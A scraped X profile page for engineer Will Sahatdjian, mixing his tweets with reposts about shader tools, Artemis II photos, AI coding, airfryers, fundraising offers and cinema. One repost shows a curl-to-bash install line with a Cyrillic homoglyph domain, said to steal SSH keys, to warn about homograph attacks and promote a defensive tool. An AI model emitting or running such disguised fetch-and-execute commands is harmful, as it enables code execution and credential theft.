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Will Sahatdjian

Will Sahatdjian

@kwcto

engineer, designer, dj, co-founder of @taxfyle

Miami, FL Katılım Ekim 2009
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Will Sahatdjian
Will Sahatdjian@kwcto·
@basementstudio This is really nice! Needs masking layers (image/gradient) and grouping. That would enable a lot more versatility (ex: sweeping gradient mask that reveals an ASCII effect)
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basement.studio@basementstudio·
gm, today we're launching Shader Lab, like photoshop but for shaders • design slick layered shader compositions • export high-quality assets or shaders • OSS package to plug & play ↳ eng.basement.studio/tools/shader-l…
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Andrew McCarthy
Andrew McCarthy@AJamesMcCarthy·
I tried my hand at processing the public jpeg of the recent Earth photo shared by the Artemis II crew. Despite just using compressed data, I was able to correct some of the motion blur and smooth out some noise to make the photo a bit cleaner. Should I do this for more photos?
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NASA Artemis
NASA Artemis@NASAArtemis·
Earthset. The Artemis II crew captured this view of an Earthset on April 6, 2026, as they flew around the Moon. The image is reminiscent of the iconic Earthrise image taken by astronaut Bill Anders 58 years earlier as the Apollo 8 crew flew around the Moon.
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Entomemeology@entomemeology·
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Christos Tzamos
Christos Tzamos@ChristosTzamos·
1/4 LLMs solve research grade math problems but struggle with basic calculations. We bridge this gap by turning them to computers. We built a computer INSIDE a transformer that can run programs for millions of steps in seconds solving even the hardest Sudokus with 100% accuracy
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Sheeki
Sheeki@sheeki03·
Be honest. When was the last time you actually read a command before pasting it into your terminal? Because these two lines look identical: curl -sSL https://install.example-cli | bash curl -sSL https://іnstall.example-clі | bash One installs your tool. The other steals your SSH keys. That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink. Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything. So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry. github.com/sheeki03/tirith
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Robinhood
Robinhood@RobinhoodApp·
We’re testing something new. Full-service tax filing. Estate planning. And a dedicated CFP® professional. Plus a 1% match on all transfers from another brokerage. Terms apply. This isn’t DIY taxes or AI-generated guidance. These are premium Concierge Services, delivered through trusted partners and built into the app you already use. To qualify, transfer at least $500K and maintain $1M+ in assets on Robinhood, or refer a friend who meets the criteria and you'll both get access. Want in? Now’s the time—spots are limited. Learn more and request access now: rbnhd.co/concierge-serv…
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Numman Ali
Numman Ali@nummanali·
Claude Code v2.1.16 adds new task management system with full dependency tracking I demoed this through CC Mirror a few weeks ago and it was extremely powerful Watch the full video - this is going to change the way you work forever Each task can be assigned to sub agents in parallel and they can easily pick up tasks as they become unblocked
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Will Sahatdjian@kwcto·
@TheCinesthetic high art - hopefully there is still enough of a market for traditional cinema in the coming era
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cinesthetic.@TheCinesthetic·
No cinematographer comes close to Roger Deakins.
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Rohan Paul
Rohan Paul@rohanpaul_ai·
Shane Legg, Chief AGI Scientist and co-founder of Google DeepMind, calls the human brain a "mobile processor" compared to what’s coming. - The human brain is essentially a low-power, 20-watt mobile processor constrained by biology. - While our internal neural signals crawl at just 30 meters per second, AI data travels at the speed of light. - Biological neurons typically fire at rates up to 100–200 Hz (with averages much lower, around 0.1–2 Hz, and some peaking at ~450 Hz), whereas modern silicon chips operate at clock speeds typically up to 6 billion Hz. i.e. Silicon is about 60million times faster - The physical gap is astronomical: AI hardware possesses a 6 to 8 order of magnitude advantage in speed, bandwidth, and scale. - Is human intelligence the universal upper limit? Shane Legg argues "absolutely not." - Just as humans cannot physically outlift a crane or outrun a dragster, our biological cognition cannot compete with industrial-scale compute. - As we master the architecture of intelligence, AI is mathematically destined to far exceed the capabilities of the human mind. --- From 'Google DeepMind and Hannah Fry' YT Channel (link in comment)
Rohan Paul@rohanpaul_ai

AI has crossed a key threshold. Its now participating in mathematics by generating nontrivial arguments, uncovering hidden structure, and solving famous valued problems without a predefined path. We now have a working loop where AI proposes a full argument, a proof assistant (like Aristotle) mechanically checks it and then finally a human expert removes any accidental loopholes.

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Will Sahatdjian@kwcto·
I ported most of @polars to C# with claude code and opus 4.5 in 2 hours(!) -> github.com/kwcto/polaire - Core data types and Series - DataFrame operations - Expression system - Lazy evaluation with query optimization - GroupBy aggregations - Join operations - String and DateTime operations - CSV/Parquet/JSON/NDJSON I/O - SIMD-optimized aggregations ~1.5-4x gap against highly-optimized Rust with architecture-specific SIMD intrinsics (AVX2/AVX512)
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Will Sahatdjian@kwcto·
@levelsio Don’t eat frozen vegetables if you can avoid it. Lots of water soluble vitamins are destroyed
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@levelsio@levelsio·
I got the Ninja Crispi glass one I'd say buy 1 then see if you like and then buy another one next to it Then you can do meat and veg at same time for 2 people Or if you single just buy 1 Remove the Teflon PFAS rubber placer and replace with a stainless steel rack, then you got almost fully glass + steel airfryer set up (except the top) I'm not affiliated or paid by Ninja but I think they're the best now Anyway throw frozen brussels sprouts or vegetables or potatoes in, then close it, wait 10 min, go code a little bit, then add frozen steak (I add salt and pepper and beef tallow or ghee) and wait another 10-15 min, maybe flip in between and you have a whole meal with no time or effort 👌 Healthy!!!
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@levelsio Which airfyer do you use?

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Will Sahatdjian@kwcto·
@TheCinesthetic I really can't wait for tasteful, subtle AI remasters to breathe new life into older sci fi cinema
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solos 🎵 open for work!
solos 🎵 open for work!@solosvtuber·
UAD is giving away one FREE plugin for black friday, claim it on their website (link in reply) U get to pick from a curated list including classics like the LA2A, 1176, Pultec EQ, and more, so def don't miss out
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Henry Shi
Henry Shi@henrythe9ths·
I got rejected by 144 investors before raising $150M for my $200M+ rev/year startup. After 144 rejections, I started questioning our approach. Were we solving the right problem? What were we doing wrong? Why weren’t investors seeing what we were seeing? Were we the right team to build this? We tried everything: different pitch angles, new deck structures, and reframing the problem. Then came the 145th meeting, where we closed our first growth round. That yes made everything worth it. But getting there took years of mistakes and hard work. We went through a lot of trial and error just to figure out what resonates with investors. We tried dozens of approaches to figure out what made investors engage. Some landed, most didn't. But each iteration taught us something about what builds conviction versus what just sounds good on paper. And once we cracked that code, our Series C closed faster than expected. And today, I see so many founders in the exact same position I was in 10 years ago: grinding through rejections, questioning everything, and trying to figure out what works. So today I want to give you the resource I wish I had back then: Something that shows you exactly how to structure these conversations and navigate the entire process (because the fundraising cycle can be a big distraction and take a toll on you as a founder). So I've partnered with Notion's Startups Team to create the essential fundraising resource that helps you avoid the mistakes that cost me years. Here's what you are getting: • The actual decks I used to raise $150M for Super[.]com (Series B, C) • 50 real examples from funded startups like Eleven Labs and Artisan AI • A searchable database of 10,000+ investors - angels, VCs, and accelerators you can reach out to immediately (this alone would take months to build manually) • An AI-powered fundraising agent built into Notion with step-by-step prompts (no separate ChatGPT needed) Want access? • Like and share this post • Comment "FUNDRAISE" • Follow me so I can DM you the link I'll send it over ASAP. P.S.: If you are serious about fundraising (now or in the future), you should grab it right away.
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Andrew D'Souza
Andrew D'Souza@andrewdsouza·
I want to help 100 founders raise their rounds before the end of the year. We just unlocked a version of @boardyai that we didn’t think was possible. Boardy raised his own $8M seed round earlier this year. Since then, he's introduced thousands of founders to investors who have raised millions. We’ve been testing an overpowered version internally, and the results have been wild - founders are meeting stronger investors and closing rounds in weeks instead of months. He’s not ready for public release yet (the token costs are insane), but it’s time to start introducing him to the world. I’m personally working with 100 founders who are actively raising to help them close before the end of the year. You’ll work directly with me and the Boardy team and get early access before this version rolls out next year. Comment “Boardy” below, and I’ll message you the link to apply. If you know someone who’s raising, tag them below.
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SMX 🇺🇸@iam_smx·
We want Jared Isaacman as NASA Administrator, let meritocracy lead the way
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